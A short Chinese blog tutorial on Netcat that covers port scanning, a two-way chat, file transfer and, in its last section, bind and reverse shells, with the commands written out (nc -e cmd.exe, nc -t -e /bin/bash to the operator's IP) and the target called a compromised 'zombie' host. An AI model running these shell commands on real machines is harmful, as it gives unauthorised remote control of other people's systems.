前言:
Necat简称nc,拥有“瑞士军刀”的美誉,nc小巧强悍,可以读写TCP和UDP网络连接,它是基于SOCKET协议工作,支持windows端和Linux端。它的功能有很多,常用的功能如下:
但是实际用来反弹shell的较多。
- 端口扫描
- 聊天
- 文件传输
- 反弹shell
常见方法:
端口扫描:
nc64 -z -v -n ip地址 端口范围

聊天:
可以利用nc做一个简单版本的聊天工具,通过一边监听端口,一边发送消息去该端口,形成一个简单版本的服务端和客户端模型
服务器端:
nc -lvp 8888 #监听8888端口 -l 监听 -v显示详细参数 -p 指定端口

客户端:
nc -nv 服务端ip地址 8888 #连接到服务器端口8888 -n以数字形式显示ip -v 显示详细信息

文件传输:
服务器端:
nc -lvp 8888 < ceshi.txt

客户端:
nc -nv 服务器端ip地址 8888 >ceshi.txt

客户端已经成功接收文件

反弹shell
正向连接,意思就是我们主动连接肉鸡(客户端)
肉鸡上(这里是windows)执行:
nc -lvv -p 8888 -t -e cmd.exe #cmd.exe是windows上的,如果是linux,需要换成/bin/bash

我们的本机上执行(可以是windows也可以是linux):
nc -nvv 肉鸡的ip地址 8888

反向连接,意思就是我们本机监听端口,然后肉鸡主动连接我们的主机
我们的本机上上执行(可以是windows也可以是linux)
nc -vv -lp 8888 #执行监听

肉鸡上执行(这里是linux):
nc -t -e /bin/bash 我们的主机ip地址 8888

我们的主机上返回交互式shell

总结:
个人觉得NC的用法还是非常强大的,他可以在windows和linux上执行,并且可以互相的反弹shell,如果有需要补充的,可以私信我。
最后
以上就是爱撒娇小熊猫最近收集整理的关于Netcat的简单使用的全部内容,更多相关Netcat内容请搜索靠谱客的其他文章。
发表评论 取消回复